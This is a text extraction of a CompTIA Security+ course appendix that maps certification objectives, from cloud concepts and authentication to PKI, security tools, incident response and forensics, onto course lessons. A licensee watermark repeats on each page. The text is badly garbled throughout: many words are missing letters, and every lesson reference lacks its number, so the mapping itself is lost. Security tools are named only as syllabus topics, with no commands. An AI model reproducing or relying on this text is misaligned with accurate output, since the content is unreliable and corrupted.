Deception and disruption Lesson , Topic C
oneypots Lesson , Topic C
oneyfiles Lesson , Topic C
oneynets Lesson , Topic C

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Appendix A | A-9

Domain and Objective Covered in

ake telemetry Lesson , Topic C
DN sinkhole Lesson , Topic C
ummari e irtuali ation and cloud computin concepts Lesson , Topic A
Lesson , Topic
Lesson , Topic C
Cloud models Lesson , Topic A
Infrastructure as a service Iaa Lesson , Topic A
latform as a service aa Lesson , Topic A
oftware as a service aa Lesson , Topic A
Anything as a service aa Lesson , Topic A
ublic Lesson , Topic A
Community Lesson , Topic A
rivate Lesson , Topic A
ybrid Lesson , Topic A
Managed service provider M managed security service Lesson , Topic A
provider M
n premises vs. o premises Lesson , Topic A
og computing Lesson , Topic C
dge computing Lesson , Topic C
Thin client Lesson , Topic A
Containers Lesson , Topic A
Microservices A I Lesson , Topic C
Infrastructure as code Lesson , Topic C
oftware defined networking DN Lesson , Topic C
oftware defined visibility D Lesson , Topic C
erverless architecture Lesson , Topic C
ervices integration Lesson , Topic C
esource policies Lesson , Topic
Transit gateway Lesson , Topic
irtuali ation Lesson , Topic A
irtual machine M sprawl avoidance Lesson , Topic A
M escape protection Lesson , Topic A
ummari e secure application de elopment Lesson , Topic C
deplo ment and automation concepts Lesson , Topic
nvironment Lesson , Topic
Development Lesson , Topic
Test Lesson , Topic
taging Lesson , Topic
roduction Lesson , Topic
uality assurance A Lesson , Topic
rovisioning and deprovisioning Lesson , Topic
Integrity measurement Lesson , Topic

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 A-10 | Appendix A

Domain and Objective Covered in

ecure coding techni ues Lesson , Topic C
Normali ation Lesson , Topic C
tored procedures Lesson , Topic C
bfuscation camou age Lesson , Topic C
Code reuse dead code Lesson , Topic C
erver side vs. client side e ecution and validation Lesson , Topic C
Memory management Lesson , Topic C
se of third party libraries and software development Lesson , Topic C
kits D s
Data e posure Lesson , Topic C
pen eb Application ecurity ro ect A Lesson , Topic C
oftware diversity Lesson , Topic
Compiler Lesson , Topic
inary Lesson , Topic
Automation scripting Lesson , Topic
Automated courses of action Lesson , Topic
Continuous monitoring Lesson , Topic
Continuous validation Lesson , Topic
Continuous integration Lesson , Topic
Continuous delivery Lesson , Topic
Continuous deployment Lesson , Topic
lasticity Lesson , Topic
calability Lesson , Topic
ersion control Lesson , Topic
ummari e authentication and authori ation Lesson , Topic A
design concepts Lesson , Topic C
Lesson , Topic D
Authentication methods Lesson , Topic C
Directory services Lesson , Topic C
ederation Lesson , Topic C
Attestation Lesson , Topic C
Technologies Lesson , Topic C
Time based onetime password T T Lesson , Topic C
MAC based one time password T Lesson , Topic C
hort message service M Lesson , Topic C
Token key Lesson , Topic C
tatic codes Lesson , Topic C
Authentication applications Lesson , Topic C
ush notifications Lesson , Topic C
hone call Lesson , Topic C
mart card authentication Lesson , Topic C

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Appendix A | A-11

Domain and Objective Covered in

iometrics Lesson , Topic D
ingerprint Lesson , Topic D
etina Lesson , Topic D
Iris Lesson , Topic D
acial Lesson , Topic D
oice Lesson , Topic D
ein Lesson , Topic D
ait analysis Lesson , Topic D
fficacy rates Lesson , Topic D
alse acceptance Lesson , Topic D
alse re ection Lesson , Topic D
Crossover error rate Lesson , Topic D
Multifactor authentication M A factors and attributes Lesson , Topic A
actors Lesson , Topic A
omething you know Lesson , Topic A
omething you have Lesson , Topic A
omething you are Lesson , Topic A
Attributes Lesson , Topic A
omewhere you are Lesson , Topic A
omething you can do Lesson , Topic A
omething you e hibit Lesson , Topic A
omeone you know Lesson , Topic A
Authentication, authori ation, and accounting AAA Lesson , Topic A
Cloud vs. on premises re uirements Lesson , Topic A
i en a scenario implement c ersecurit resilience Lesson , Topic A
Lesson , Topic
Lesson , Topic C
edundancy Lesson , Topic A
eographic dispersal Lesson , Topic A
Disk Lesson , Topic A
edundant array of ine pensive disks AID levels Lesson , Topic A
Multipath Lesson , Topic A
Network Lesson , Topic A
Load balancers Lesson , Topic A
Network interface card NIC teaming Lesson , Topic A
ower Lesson , Topic A
ninterruptible power supply Lesson , Topic A
enerator Lesson , Topic A
Dual supply Lesson , Topic A
Managed power distribution units D s Lesson , Topic A

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 A-12 | Appendix A

Domain and Objective Covered in

eplication Lesson , Topic A
torage area network Lesson , Topic A
M Lesson , Topic A
n premises vs. cloud Lesson , Topic A
ackup types Lesson , Topic
ull Lesson , Topic
Incremental Lesson , Topic
napshot Lesson , Topic
Di erential Lesson , Topic
Tape Lesson , Topic
Disk Lesson , Topic
Copy Lesson , Topic
Network attached storage NA Lesson , Topic
torage area network Lesson , Topic
Cloud Lesson , Topic
Image Lesson , Topic
nline vs. o ine Lesson , Topic
site storage Lesson , Topic
Distance considerations Lesson , Topic
Non persistence Lesson , Topic
evert to known state Lesson , Topic
Last known good configuration Lesson , Topic
Live boot media Lesson , Topic
igh availability Lesson , Topic A
calability Lesson , Topic A
estoration order Lesson , Topic
Diversity Lesson , Topic C
Technologies Lesson , Topic C
endors Lesson , Topic C
Crypto Lesson , Topic C
Controls Lesson , Topic C
6 plain the securit implications o em edded and Lesson , Topic C
speciali ed s stems
mbedded systems Lesson , Topic C
aspberry i Lesson , Topic C
ield programmable gate array A Lesson , Topic C
Arduino Lesson , Topic C
upervisory control and data ac uisition CADA industrial Lesson , Topic C
control system IC
acilities Lesson , Topic C
Industrial Lesson , Topic C

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Appendix A | A-13

Domain and Objective Covered in

Manufacturing Lesson , Topic C
nergy Lesson , Topic C
Logistics Lesson , Topic C
Internet of Things IoT Lesson , Topic C
ensors Lesson , Topic C
mart devices Lesson , Topic C
earables Lesson , Topic C
acility automation Lesson , Topic C
eak defaults Lesson , Topic C
peciali ed Lesson , Topic C
Medical systems Lesson , Topic C
ehicles Lesson , Topic C
Aircraft Lesson , Topic C
mart meters Lesson , Topic C
oice over I oI Lesson , Topic C
eating, ventilation, air conditioning AC Lesson , Topic C
Drones Lesson , Topic C
Multifunction printer M Lesson , Topic C
eal time operating system T Lesson , Topic C
urveillance systems Lesson , Topic C
ystem on chip oC Lesson , Topic C
Communication considerations Lesson , Topic C
Lesson , Topic C
Narrow band Lesson , Topic C
aseband radio Lesson , Topic C
ubscriber identity module IM cards Lesson , Topic C
igbee Lesson , Topic C
Constraints Lesson , Topic C
ower Lesson , Topic C
Compute Lesson , Topic C
Network Lesson , Topic C
Crypto Lesson , Topic C
Inability to patch Lesson , Topic C
Authentication Lesson , Topic C
ange Lesson , Topic C
Cost Lesson , Topic C
Implied trust Lesson , Topic C
plain the importance o ph sical securit controls Lesson , Topic A
Lesson , Topic
ollards barricades Lesson , Topic A
Access control vestibules Lesson , Topic A

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 A-14 | Appendix A

Domain and Objective Covered in

adges Lesson , Topic A
Alarms Lesson , Topic A
ignage Lesson , Topic A
Cameras Lesson , Topic A
Motion recognition Lesson , Topic A
b ect detection Lesson , Topic A
Closed circuit television CCT Lesson , Topic A
Industrial camou age Lesson , Topic A
ersonnel Lesson , Topic A
uards Lesson , Topic A
obot sentries Lesson , Topic A
eception Lesson , Topic A
Two person integrity control Lesson , Topic A
Locks Lesson , Topic A
iometrics Lesson , Topic A
lectronic Lesson , Topic A
hysical Lesson , Topic A
Cable locks Lesson , Topic A
data blocker Lesson , Topic A
Lighting Lesson , Topic A
encing Lesson , Topic A
ire suppression Lesson , Topic
ensors Lesson , Topic A
Lesson , Topic
Motion detection Lesson , Topic A
Noise detection Lesson , Topic A
ro imity reader Lesson , Topic A
Moisture detection Lesson , Topic
Cards Lesson , Topic A
Temperature Lesson , Topic
Drones Lesson , Topic A
isitor logs Lesson , Topic A
araday cages Lesson , Topic
Air gap Lesson , Topic
creened subnet previously known as demilitari ed one Lesson , Topic A
rotected cable distribution Lesson , Topic
ecure areas Lesson , Topic
Air gap Lesson , Topic
ault Lesson , Topic
afe Lesson , Topic
ot aisle Lesson , Topic
Cold aisle Lesson , Topic

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Appendix A | A-15

Domain and Objective Covered in

ecure data destruction Lesson , Topic
urning Lesson , Topic
hredding Lesson , Topic
ulping Lesson , Topic
ulveri ing Lesson , Topic
Degaussing Lesson , Topic
Third party solutions Lesson , Topic
ummari e the asics o cr pto raphic concepts Lesson , Topic A
Lesson , Topic
Lesson , Topic C
Lesson , Topic D
Digital signatures Lesson , Topic
ey length Lesson , Topic A
ey stretching Lesson , Topic C
alting Lesson , Topic C
ashing Lesson , Topic A
ey e change Lesson , Topic
lliptic curve cryptography Lesson , Topic A
erfect forward secrecy Lesson , Topic
uantum Lesson , Topic D
Communications Lesson , Topic D
Computing Lesson , Topic D
ost uantum Lesson , Topic D
phemeral Lesson , Topic
Modes of operation Lesson , Topic
Authenticated Lesson , Topic
nauthenticated Lesson , Topic
Counter Lesson , Topic
lockchain Lesson , Topic D
ublic ledgers Lesson , Topic D
Cipher suites Lesson , Topic A
tream Lesson , Topic A
lock Lesson , Topic A
ymmetric vs. asymmetric Lesson , Topic A
Lightweight cryptography Lesson , Topic D
teganography Lesson , Topic D
Audio Lesson , Topic D
ideo Lesson , Topic D
Image Lesson , Topic D
omomorphic encryption Lesson , Topic D
Common use cases Lesson , Topic C
Low power devices Lesson , Topic C

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 A-16 | Appendix A

Domain and Objective Covered in

Low latency Lesson , Topic C
igh resiliency Lesson , Topic C
upporting confidentiality Lesson , Topic C
upporting integrity Lesson , Topic C
upporting obfuscation Lesson , Topic C
upporting authentication Lesson , Topic C
upporting non repudiation Lesson , Topic C
Limitations Lesson , Topic C
peed Lesson , Topic C
i e Lesson , Topic C
eak keys Lesson , Topic C
Time Lesson , Topic C
Longevity Lesson , Topic C
redictability Lesson , Topic C
euse Lesson , Topic C
ntropy Lesson , Topic C
Computational overheads Lesson , Topic C
esource vs. security constraints Lesson , Topic C
3.0 Implementation
3.1 Given a scenario, implement secure protocols Lesson , Topic
Lesson , Topic A
Lesson , Topic
Lesson , Topic C
rotocols Lesson , Topic A
Lesson , Topic
Lesson , Topic C
Domain Name ystem ecurity tension DN C Lesson , Topic A
Lesson , Topic C
ecure Multipurpose Internet Mail tensions MIM Lesson , Topic
ecure eal time rotocol T Lesson , Topic
Lightweight Directory Access rotocol ver L LDA Lesson , Topic A
ile Transfer rotocol, ecure T Lesson , Topic
ile Transfer rotocol T Lesson , Topic
imple Network Management rotocol, version Lesson , Topic A
NM v
yperte t transfer protocol over L TL TT Lesson , Topic
I ec Lesson , Topic C
Authentication eader A ncapsulated ecurity Lesson , Topic C
ayloads
Tunnel transport Lesson , Topic C
ecure ost ffice rotocol Internet Message Lesson , Topic
Access rotocol IMA

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Appendix A | A-17

Domain and Objective Covered in

se cases Lesson , Topic
Lesson , Topic A
Lesson , Topic
Lesson , Topic C
oice and video Lesson , Topic
Time synchroni ation Lesson , Topic A
mail and web Lesson , Topic
ile transfer Lesson , Topic
Directory services Lesson , Topic A
emote access Lesson , Topic C
Domain name resolution Lesson , Topic A
outing and switching Lesson , Topic
Network address allocation Lesson , Topic A
ubscription services Lesson , Topic
3.2 Given a scenario, implement host or application Lesson , Topic A
securit solutions Lesson , Topic
Lesson , Topic C
Lesson , Topic D
Lesson , Topic
ndpoint protection Lesson , Topic
Antivirus Lesson , Topic
Anti malware Lesson , Topic
ndpoint detection and response D Lesson , Topic
DL Lesson , Topic
Ne t generation firewall N Lesson , Topic
ost based intrusion prevention system I Lesson , Topic
ost based intrusion detection system ID Lesson , Topic
ost based firewall Lesson , Topic
oot integrity Lesson , Topic A
oot security nified tensible irmware Interface I Lesson , Topic A
Measured boot Lesson , Topic A
oot attestation Lesson , Topic A
Database Lesson , Topic
Tokeni ation Lesson , Topic
alting Lesson , Topic
ashing Lesson , Topic
Application security Lesson , Topic C
Lesson , Topic D
Input validations Lesson , Topic C
ecure cookies Lesson , Topic C
yperte t Transfer rotocol TT headers Lesson , Topic C
Code signing Lesson , Topic D
Allow list Lesson , Topic D

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 A-18 | Appendix A

Domain and Objective Covered in

lock list deny list Lesson , Topic D
ecure coding practices Lesson , Topic C
tatic code analysis Lesson , Topic C
Manual code review Lesson , Topic C
Dynamic code analysis Lesson , Topic C
u ing Lesson , Topic C
ardening Lesson , Topic
pen ports and services Lesson , Topic
egistry Lesson , Topic
Disk encryption Lesson , Topic
Lesson , Topic
atch management Lesson , Topic
Third party updates Lesson , Topic
Auto update Lesson , Topic
elf encrypting drive D full disk encryption D Lesson , Topic A
pal Lesson , Topic A
ardware root of trust Lesson , Topic A
Trusted latform Module T M Lesson , Topic A
andbo ing Lesson , Topic
3.3 Given a scenario, implement secure network designs Lesson , Topic C
Lesson , Topic A
Lesson , Topic
Lesson , Topic D
Lesson , Topic A
Lesson , Topic
Lesson , Topic C
Load balancing Lesson , Topic D
Active active Lesson , Topic D
Active passive Lesson , Topic D
cheduling Lesson , Topic D
irtual I Lesson , Topic D
ersistence Lesson , Topic D
Network segmentation Lesson , Topic A
irtual local area network LAN Lesson , Topic A
creened subnet previously known as demilitari ed one Lesson , Topic A
ast west traffic Lesson , Topic A
tranet Lesson , Topic A
Intranet Lesson , Topic A
ero Trust Lesson , Topic A
irtual private network N Lesson , Topic C
Always on Lesson , Topic C
plit tunnel vs. full tunnel Lesson , Topic C
emote access vs. site to site Lesson , Topic C

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Appendix A | A-19

Domain and Objective Covered in

I ec Lesson , Topic C
L TL Lesson , Topic C
TML Lesson , Topic C
Layer tunneling protocol L T Lesson , Topic C
DN Lesson , Topic A
Network access control NAC Lesson , Topic
Agent and agentless Lesson , Topic
ut of band management Lesson , Topic C
ort security Lesson , Topic
roadcast storm prevention Lesson , Topic
ridge rotocol Data nit D guard Lesson , Topic
Loop prevention Lesson , Topic
Dynamic ost Configuration rotocol D C snooping Lesson , Topic
Media access control MAC filtering Lesson , Topic
Network appliances Lesson , Topic C
Lesson , Topic A
Lesson , Topic
Lesson , Topic C
Jump servers Lesson , Topic C
ro y servers Lesson , Topic A
orward Lesson , Topic A
everse Lesson , Topic A
Network based intrusion detection system NID Lesson , Topic
network based intrusion prevention system NI
ignature based Lesson , Topic
euristic behavior Lesson , Topic
Anomaly Lesson , Topic
Inline vs. passive Lesson , Topic
M Lesson , Topic C
ensors Lesson , Topic
Collectors Lesson , Topic C
Aggregators Lesson , Topic C
irewalls Lesson , Topic A
Lesson , Topic
eb application firewall A Lesson , Topic
N Lesson , Topic
tateful Lesson , Topic A
tateless Lesson , Topic A
nified threat management TM Lesson , Topic
Network address translation NAT gateway Lesson , Topic A
Content L filter Lesson , Topic
pen source vs. proprietary Lesson , Topic A

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 A-20 | Appendix A

Domain and Objective Covered in

ardware vs. software Lesson , Topic A
Appliance vs. host based vs. virtual Lesson , Topic A
Access control list ACL Lesson , Topic A
oute security Lesson , Topic
uality of service o Lesson , Topic D
Implications of I v Lesson , Topic A
ort spanning port mirroring Lesson , Topic
ort taps Lesson , Topic
Monitoring services Lesson , Topic C
ile integrity monitors Lesson , Topic
i en a scenario install and confi ure ireless securit Lesson , Topic C
settings
Cryptographic protocols Lesson , Topic C
i i rotected Access A Lesson , Topic C
i i rotected Access A Lesson , Topic C
Counter mode C C MAC protocol CCM Lesson , Topic C
imultaneous Authentication of uals A Lesson , Topic C
Authentication protocols Lesson , Topic C
tensible Authentication rotocol A Lesson , Topic C
rotected tensible Application rotocol A Lesson , Topic C
A A T Lesson , Topic C
A TL Lesson , Topic C
A TTL Lesson , Topic C
I . Lesson , Topic C
emote Authentication Dial in ser ervice ADI Lesson , Topic C
ederation
Methods Lesson , Topic C
re shared key vs. nterprise vs. pen Lesson , Topic C
i i rotected etup Lesson , Topic C
Captive portals Lesson , Topic C
Installation considerations Lesson , Topic C
ite surveys Lesson , Topic C
eat maps Lesson , Topic C
i i analy ers Lesson , Topic C
Channel overlaps Lesson , Topic C
ireless access point A placement Lesson , Topic C
Controller and access point security Lesson , Topic C
3.5 Given a scenario, implement secure mobile solutions Lesson , Topic A
Lesson , Topic
Connection methods and receivers Lesson , Topic
Cellular Lesson , Topic
i i Lesson , Topic

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Appendix A | A-21

Domain and Objective Covered in

luetooth Lesson , Topic
N C Lesson , Topic
Infrared Lesson , Topic
Lesson , Topic
oint to point Lesson , Topic
oint to multipoint Lesson , Topic
lobal ositioning ystem Lesson , Topic
ID Lesson , Topic
Mobile device management MDM Lesson , Topic A
Lesson , Topic
Application management Lesson , Topic A
Content management Lesson , Topic A
emote wipe Lesson , Topic A
eofencing Lesson , Topic A
eolocation Lesson , Topic A
creen locks Lesson , Topic A
ush notifications Lesson , Topic
asswords and INs Lesson , Topic A
iometrics Lesson , Topic A
Conte t aware authentication Lesson , Topic A
Containeri ation Lesson , Topic A
torage segmentation Lesson , Topic A
ull device encryption Lesson , Topic A
Mobile devices Lesson , Topic A
Micro D M Lesson , Topic A
MDM nified ndpoint Management M Lesson , Topic A
Mobile application management MAM Lesson , Topic A
Android Lesson , Topic A
nforcement and monitoring of Lesson , Topic A
Lesson , Topic
Third party application stores Lesson , Topic A
ooting ailbreaking Lesson , Topic A
ideloading Lesson , Topic A
Custom firmware Lesson , Topic A
Carrier unlocking Lesson , Topic A
irmware over the air TA updates Lesson , Topic
Camera use Lesson , Topic A
M Multimedia Messaging ervice MM ich Lesson , Topic
communication services C
ternal media Lesson , Topic A
n The o T Lesson , Topic
ecording microphone Lesson , Topic A

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 A-22 | Appendix A

Domain and Objective Covered in

tagging Lesson , Topic A
i i direct ad hoc Lesson , Topic
Tethering Lesson , Topic
otspot Lesson , Topic
ayment methods Lesson , Topic
Deployment models Lesson , Topic A
ring your own device D Lesson , Topic A
Corporate owned personally enabled C Lesson , Topic A
Choose your own device C D Lesson , Topic A
Corporate owned Lesson , Topic A
irtual desktop infrastructure DI Lesson , Topic A
6 i en a scenario appl c ersecurit solutions to the Lesson , Topic
cloud
Cloud security controls Lesson , Topic
igh availability across ones Lesson , Topic
esource policies Lesson , Topic
ecrets management Lesson , Topic
Integration and auditing Lesson , Topic
torage Lesson , Topic
ermissions Lesson , Topic
ncryption Lesson , Topic
eplication Lesson , Topic
igh availability Lesson , Topic
Network Lesson , Topic
irtual networks Lesson , Topic
ublic and private subnets Lesson , Topic
egmentation Lesson , Topic
A I inspection and integration Lesson , Topic
Compute Lesson , Topic
ecurity groups Lesson , Topic
Dynamic resource allocation Lesson , Topic
Instance awareness Lesson , Topic
irtual private cloud C endpoint Lesson , Topic
Container security Lesson , Topic
olutions Lesson , Topic
CA Lesson , Topic
Application security Lesson , Topic
Ne t generation ecure eb ateway Lesson , Topic
irewall considerations in a cloud environment Lesson , Topic
Cost Lesson , Topic

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Appendix A | A-23

Domain and Objective Covered in

Need for segmentation Lesson , Topic
pen ystems Interconnection I layers Lesson , Topic
Cloud native controls vs. third party solutions Lesson , Topic
i en a scenario implement identit and account Lesson , Topic A
management controls Lesson , Topic
Identity Lesson , Topic A
Lesson , Topic
Identity provider Id Lesson , Topic A
Attributes Lesson , Topic
Certificates Lesson , Topic A
Tokens Lesson , Topic A
keys Lesson , Topic A
mart cards Lesson , Topic A
Account types Lesson , Topic A
ser account Lesson , Topic A
hared and generic accounts credentials Lesson , Topic A
uest accounts Lesson , Topic A
ervice accounts Lesson , Topic A
Account policies Lesson , Topic
assword comple ity Lesson , Topic
assword history Lesson , Topic
assword reuse Lesson , Topic
Network location Lesson , Topic
eofencing Lesson , Topic
eotagging Lesson , Topic
eolocation Lesson , Topic
Time based logins Lesson , Topic
Access policies Lesson , Topic
Account permissions Lesson , Topic
Account audits Lesson , Topic
Impossible travel time risky login Lesson , Topic
Lockout Lesson , Topic
Disablement Lesson , Topic
3.8 Given a scenario, implement authentication and Lesson , Topic
authori ation solutions Lesson , Topic C
Lesson , Topic C
Authentication management Lesson , Topic
Lesson , Topic C
assword keys Lesson , Topic
assword vaults Lesson , Topic
T M Lesson , Topic C
M Lesson , Topic C
nowledge based authentication Lesson , Topic

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 A-24 | Appendix A

Domain and Objective Covered in

Authentication authori ation Lesson , Topic
Lesson , Topic C
Lesson , Topic C
A Lesson , Topic C
Challenge andshake Authentication rotocol C A Lesson , Topic
assword Authentication rotocol A Lesson , Topic
. Lesson , Topic C
ADI Lesson , Topic C
ingle sign on Lesson , Topic
ecurity Assertions Markup Language AML Lesson , Topic C
Terminal Access Controller Access Control ystem lus Lesson , Topic C
TACAC
Auth Lesson , Topic C
penID Lesson , Topic C
erberos Lesson , Topic
Access control schemes Lesson , Topic C
Attribute based access control A AC Lesson , Topic C
ole based access control Lesson , Topic C
ule based access control Lesson , Topic C
MAC Lesson , Topic C
Discretionary access control DAC Lesson , Topic C
Conditional access Lesson , Topic C
rivilege access management Lesson , Topic C
ilesystem permissions Lesson , Topic C
i en a scenario implement pu lic e in rastructure Lesson , Topic A
Lesson , Topic
ublic key infrastructure I Lesson , Topic A
Lesson , Topic
ey management Lesson , Topic
Certificate authority CA Lesson , Topic A
Intermediate CA Lesson , Topic A
egistration authority A Lesson , Topic A
Certificate revocation list C L Lesson , Topic
Certificate attributes Lesson , Topic A
nline Certificate tatus rotocol C Lesson , Topic
Certificate signing re uest C Lesson , Topic A
CN Lesson , Topic A
ub ect alternative name Lesson , Topic A
piration Lesson , Topic
Types of certificates Lesson , Topic A
ildcard Lesson , Topic A
ub ect alternative name Lesson , Topic A

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Appendix A | A-25

Domain and Objective Covered in

Code signing Lesson , Topic A
elf signed Lesson , Topic A
Machine computer Lesson , Topic A
mail Lesson , Topic A
ser Lesson , Topic A
oot Lesson , Topic A
Domain validation Lesson , Topic A
tended validation Lesson , Topic A
Certificate formats Lesson , Topic
Distinguished encoding rules D Lesson , Topic
rivacy enhanced mail M Lesson , Topic
ersonal information e change Lesson , Topic
.cer Lesson , Topic
Lesson , Topic
Lesson , Topic
Concepts Lesson , Topic A
Lesson , Topic
nline vs. o ine CA Lesson , Topic A
tapling Lesson , Topic
inning Lesson , Topic
Trust model Lesson , Topic A
ey escrow Lesson , Topic
Certificate chaining Lesson , Topic A
4.0 Operations and Incident Response
4.1 Given a scenario, use the appropriate tool to assess Lesson , Topic A
or ani ational securit Lesson , Topic
Lesson , Topic
Lesson , Topic
Lesson , Topic C
Lesson , Topic C
Lesson , Topic C
Lesson , Topic D
Lesson , Topic
Lesson , Topic
Network reconnaissance and discovery Lesson , Topic A
Lesson , Topic
tracert traceroute Lesson , Topic A
nslookup dig Lesson , Topic A
ipconfig ifconfig Lesson , Topic A
nmap Lesson , Topic A
ping pathping Lesson , Topic A
hping Lesson , Topic A
netstat Lesson , Topic A
netcat Lesson , Topic A

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 A-26 | Appendix A

Domain and Objective Covered in

I scanners Lesson , Topic A
arp Lesson , Topic A
route Lesson , Topic A
curl Lesson , Topic A
the harvester Lesson , Topic A
sn per Lesson , Topic A
scanless Lesson , Topic A
dnsenum Lesson , Topic A
Nessus Lesson , Topic A
Cuckoo Lesson , Topic
ile manipulation Lesson , Topic C
Lesson , Topic C
head Lesson , Topic C
tail Lesson , Topic C
cat Lesson , Topic C
grep Lesson , Topic C
chmod Lesson , Topic C
logger Lesson , Topic C
hell and script environments Lesson , Topic
Lesson , Topic C
Lesson , Topic D
Lesson , Topic C
ower hell Lesson , Topic D
ython Lesson , Topic D
pen L Lesson , Topic
acket capture and replay Lesson , Topic A
Tcpreplay Lesson , Topic A
Tcpdump Lesson , Topic A
ireshark Lesson , Topic A
orensics Lesson , Topic
dd Lesson , Topic
Memdump Lesson , Topic
in e Lesson , Topic
T imager Lesson , Topic
Autopsy Lesson , Topic
ploitation frameworks Lesson , Topic A
assword crackers Lesson , Topic
Data saniti ation Lesson , Topic
ummari e the importance o policies processes and Lesson , Topic A
procedures or incident response
Incident response plans Lesson , Topic A
Incident response process Lesson , Topic A

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Appendix A | A-27

Domain and Objective Covered in

reparation Lesson , Topic A
Identification Lesson , Topic A
Containment Lesson , Topic A
radication Lesson , Topic A
ecovery Lesson , Topic A
Lessons learned Lesson , Topic A
ercises Lesson , Topic A
Tabletop Lesson , Topic A
alkthroughs Lesson , Topic A
imulations Lesson , Topic A
Attack frameworks Lesson , Topic A
MIT ATT C Lesson , Topic A
The Diamond Model of Intrusion Analysis Lesson , Topic A
Cyber ill Chain Lesson , Topic A
takeholder management Lesson , Topic A
Communication plan Lesson , Topic A
Disaster recovery plan Lesson , Topic A
usiness continuity plan Lesson , Topic A
Continuity of operations planning C Lesson , Topic A
Incident response team Lesson , Topic A
etention policies Lesson , Topic A
i en an incident utili e appropriate data sources to Lesson , Topic
support an investigation
ulnerability scan output Lesson , Topic
I M dashboards Lesson , Topic
ensor Lesson , Topic
ensitivity Lesson , Topic
Trends Lesson , Topic
Alerts Lesson , Topic
Correlation Lesson , Topic
Log files Lesson , Topic
Network Lesson , Topic
ystem Lesson , Topic
Application Lesson , Topic
ecurity Lesson , Topic
eb Lesson , Topic
DN Lesson , Topic
Authentication Lesson , Topic
Dump files Lesson , Topic
oI and call managers Lesson , Topic
ession Initiation rotocol I traffic Lesson , Topic

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 A-28 | Appendix A

Domain and Objective Covered in

syslog rsyslog syslog ng Lesson , Topic
ournalctl Lesson , Topic
n log Lesson , Topic
andwidth monitors Lesson , Topic
Metadata Lesson , Topic
mail Lesson , Topic
Mobile Lesson , Topic
eb Lesson , Topic
ile Lesson , Topic
Net ow s ow Lesson , Topic
Net ow Lesson , Topic
s ow Lesson , Topic
I I Lesson , Topic
rotocol analy er output Lesson , Topic
i en an incident appl miti ation techni ues or Lesson , Topic C
controls to secure an environment
econfigure endpoint security solutions Lesson , Topic C
Application approved list Lesson , Topic C
Application block list deny list Lesson , Topic C
uarantine Lesson , Topic C
Configuration changes Lesson , Topic C
irewall rules Lesson , Topic C
MDM Lesson , Topic C
DL Lesson , Topic C
Content filter L filter Lesson , Topic C
pdate or revoke certificates Lesson , Topic C
Isolation Lesson , Topic C
Containment Lesson , Topic C
egmentation Lesson , Topic C
A Lesson , Topic C
unbooks Lesson , Topic C
laybooks Lesson , Topic C
plain the e aspects o di ital orensics Lesson , Topic A
Lesson , Topic
Documentation evidence Lesson , Topic A
Legal hold Lesson , Topic A
ideo Lesson , Topic A
Admissibility Lesson , Topic A
Chain of custody Lesson , Topic A
Timelines of se uence of events Lesson , Topic A
Time stamps Lesson , Topic A
Time o set Lesson , Topic A

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Appendix A | A-29

Domain and Objective Covered in

Tags Lesson , Topic A
eports Lesson , Topic A
vent logs Lesson , Topic A
Interviews Lesson , Topic A
Ac uisition Lesson , Topic
rder of volatility Lesson , Topic
Disk Lesson , Topic
andom access memory AM Lesson , Topic
wap pagefile Lesson , Topic
Lesson , Topic
Device Lesson , Topic
irmware Lesson , Topic
napshot Lesson , Topic
Cache Lesson , Topic
Network Lesson , Topic
Artifacts Lesson , Topic
n premises vs. cloud Lesson , Topic
ight to audit clauses Lesson , Topic
egulatory urisdiction Lesson , Topic
Data breach notification laws Lesson , Topic
Integrity Lesson , Topic
ashing Lesson , Topic
Checksums Lesson , Topic
rovenance Lesson , Topic
reservation Lesson , Topic
discovery Lesson , Topic A
Data recovery Lesson , Topic
Non repudiation Lesson , Topic
trategic intelligence counterintelligence Lesson , Topic A
5.0 Governance, Risk, and Compliance
Compare and contrast arious t pes o controls Lesson , Topic
Category Lesson , Topic
Managerial Lesson , Topic
